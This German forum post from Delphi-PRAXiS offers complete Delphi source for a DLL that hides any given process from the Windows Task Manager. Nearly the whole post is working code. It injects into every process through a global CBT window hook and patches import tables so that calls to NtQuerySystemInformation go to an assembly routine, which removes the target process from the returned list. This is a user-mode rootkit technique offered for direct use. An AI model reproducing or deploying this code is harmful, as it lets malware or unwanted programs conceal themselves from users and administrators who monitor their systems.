Delphi-PRAXiS - Einzelnen Beitrag anzeigen - Delphi Prozesse vor dem Taskmanager verstecken (XP,2000)

**ATH0**

Die folgende DLL exportiert die Funktion :

function HideNtProcess(pid

WORD):BOOL;

Sie versteckt "jeden" beliebigen Prozess vor dem Taskmanager. (Professionellere Tankmanager wie zb. ProcExplorer sehen den Task nach wie vor)

zusammenfalten · markieren

Delphi-Quellcode:

			library HideProcessNT;

uses

  Windows,tlhelp32,ImageHlp,SysUtils;

var

  hmap: THandle;

  hFirstMapHandle:THandle;

type

  SYSTEM_INFORMATION_CLASS = (SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation,

    SystemTimeOfDayInformation, SystemNotImplemented1, SystemProcessesAndThreadsInformation, SystemCallCounts,

    SystemConfigurationInformation, SystemProcessorTimes, SystemGlobalFlag, SystemNotImplemented2, SystemModuleInformation,

    SystemLockInformation, SystemNotImplemented3, SystemNotImplemented4, SystemNotImplemented5,

    SystemHandleInformation, SystemObjectInformation, SystemPagefileInformation,

    SystemInstructionEmulationCounts, SystemInvalidInfoClass1, SystemCacheInformation,

    SystemPoolTagInformation, SystemProcessorStatistics, SystemDpcInformation,

    SystemNotImplemented6, SystemLoadImage, SystemUnloadImage, SystemTimeAdjustment,

    SystemNotImplemented7, SystemNotImplemented8, SystemNotImplemented9,

    SystemCrashDumpInformation, SystemExceptionInformation, SystemCrashDumpStateInformation,

    SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation,

    SystemLoadAndCallImage, SystemPrioritySeparation, SystemNotImplemented10, SystemNotImplemented11,

    SystemInvalidInfoClass2, SystemInvalidInfoClass3, SystemTimeZoneInformation,

    SystemLookasideInformation, SystemSetTimeSlipEvent, SystemCreateSession, SystemDeleteSession, SystemInvalidInfoClass4,

    SystemRangeStartInformation, SystemVerifierInformation, SystemAddVerifier, SystemSessionProcessesInformation

  );

  PFARPROC = ^FARPROC;

  _IMAGE_IMPORT_DESCRIPTOR = packed record

    case Integer of

      0:(Characteristics: DWORD);

      1:(OriginalFirstThunk: DWORD; TimeDateStamp: DWORD; ForwarderChain: DWORD; Name: DWORD; FirstThunk: DWORD);

  end;

  IMAGE_IMPORT_DESCRIPTOR = _IMAGE_IMPORT_DESCRIPTOR;

  PIMAGE_IMPORT_DESCRIPTOR = ^IMAGE_IMPORT_DESCRIPTOR;

procedure RedirectIAT(pszCallerModName: Pchar; pfnCurrent: FarProc; pfnNew: FARPROC; hmodCaller: hModule);

var

  ulSize: ULONG;

  pImportDesc: PIMAGE_IMPORT_DESCRIPTOR;

  pszModName: PChar;

  pThunk: PDWORD;

  ppfn:PFARPROC;

  ffound: LongBool;

  written: DWORD;

begin

  pImportDesc:= ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);

  if pImportDesc = nil then exit;

  while pImportDesc.Name<>0 do

  begin

    pszModName := PChar(hmodCaller + pImportDesc.Name);

    if (lstrcmpiA(pszModName, pszCallerModName) = 0) then break;

    Inc(pImportDesc);

  end;

  if (pImportDesc.Name = 0) then exit;

  pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);

  while pThunk^<>0 do

  begin

    ppfn := PFARPROC(pThunk);

    fFound := (ppfn^ = pfnCurrent);

    if (fFound) then

    begin

      VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);

      WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);

      exit;

    end;

    Inc(pThunk);

  end;

end;

var

  addr_NtQuerySystemInformation: Pointer;

  mypid: DWORD;

  fname: PCHAR;

  mapaddr: PDWORD;

  hideOnlyTaskMan: PBOOL;

function myNtQuerySystemInfo(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: Pointer;

  SystemInformationLength:ULONG; ReturnLength:PULONG):LongInt; stdcall;

label lop, nextpid, exit, fillzero;

asm

  push ReturnLength

  push SystemInformationLength

  push SystemInformation

  push dword ptr SystemInformationClass

  call dword ptr [addr_NtQuerySystemInformation]

  or eax,eax

  jl exit

  cmp SystemInformationClass, SystemProcessesAndThreadsInformation

  jne exit

lop:

  mov esi, SystemInformation

nextpid:

  mov ebx, esi

  cmp dword ptr [esi],0

  je exit

  add esi, [esi]

  mov ecx, [esi+44h]

  cmp ecx, mypid

  jne nextpid

  mov edx, [esi]

  test edx, edx

  je fillzero

  add [ebx], edx

  jmp lop

fillzero:

  and [ebx], edx

  jmp lop

exit:

  mov Result, eax

end;

procedure FuncIncept;

var

  hSnapShot: THandle;

  me32: MODULEENTRY32;

begin

  addr_NtQuerySystemInformation := GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');

  hSnapShot := CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);

  if hSnapshot = INVALID_HANDLE_VALUE then exit;

  try

    ZeroMemory(@me32,sizeof(MODULEENTRY32));

    me32.dwSize:=sizeof(MODULEENTRY32);

    Module32First(hSnapShot,me32);

    repeat

      RedirectIAT('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);

    until not Module32Next(hSnapShot,me32);

  finally

    CloseHandle(hSnapShot);

  end;

end;

procedure FreeFunc;

var

  hSnapShot: THandle;

  me32: MODULEENTRY32;

begin

  addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');

  hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);

  if hSnapshot=INVALID_HANDLE_VALUE then exit;

  try

    ZeroMemory(@me32,sizeof(MODULEENTRY32));

    me32.dwSize:=sizeof(MODULEENTRY32);

    Module32First(hSnapShot,me32);

    repeat

      RedirectIAT('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);

    until not Module32Next(hSnapShot,me32);

  finally

    CloseHandle(hSnapShot);

  end;

end;

var

  HookHandle: THandle;

function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;

begin

  Result:=0;

end;

procedure AttachHook; stdcall;

begin

  HookHandle := SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);

end;

procedure LibraryProc(Reason: Integer);

begin

  if Reason = DLL_PROCESS_DETACH then

    if mypid > 0 then

      FreeFunc()

    else

      CloseHandle(hFirstMapHandle);

end;

function HideNtProcess(pid:DWORD):BOOL; stdcall;

var

  addrMap: PDWORD;

  ptr2: PBOOL;

  OnlyBlindTaskmgr: BOOL;

begin

  mypid:=0;

  result:=false;

  OnlyBlindTaskmgr:=False; 

  hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');

  if hFirstMapHandle=0 then exit;

  addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);

  if addrMap=nil then

  begin

    CloseHandle(hFirstMapHandle);

    exit;

  end;

  addrMap^:=pid;

  ptr2:=PBOOL(DWORD(addrMap)+4);

  ptr2^:=OnlyBlindTaskmgr;

  UnmapViewOfFile(addrMap);

  AttachHook;

  result:=true;

end;

exports

  HideNtProcess;

begin

  hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');

  if hmap=0 then exit;

  try

    mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);

    if mapaddr=nil then exit;

    mypid:=mapaddr^;

    hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);

    if hideOnlyTaskMan^ then

    begin

      fname:=allocMem(MAX_PATH+1);

      GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);

      if not (ExtractFileName(fname)='taskmgr.exe') then exit;

    end;

    FuncIncept;

  finally

    UnmapViewOfFile(mapaddr);

    CloseHandle(Hmap);

    DLLProc:=@LibraryProc;

  end;

end.

http://www.hackerboard.de/thread.php?threadid=18268

Die Diskussion zu diesem Source und die Nachteile dieser Methode findet man

hier.

[edit=Chakotay1308]Source grundlegend formatiert. Mfg, Chakotay1308[/edit]
[edit=Chakotay1308]Hinweis zur Diskussion angefügt. Mfg, Chakotay1308[/edit]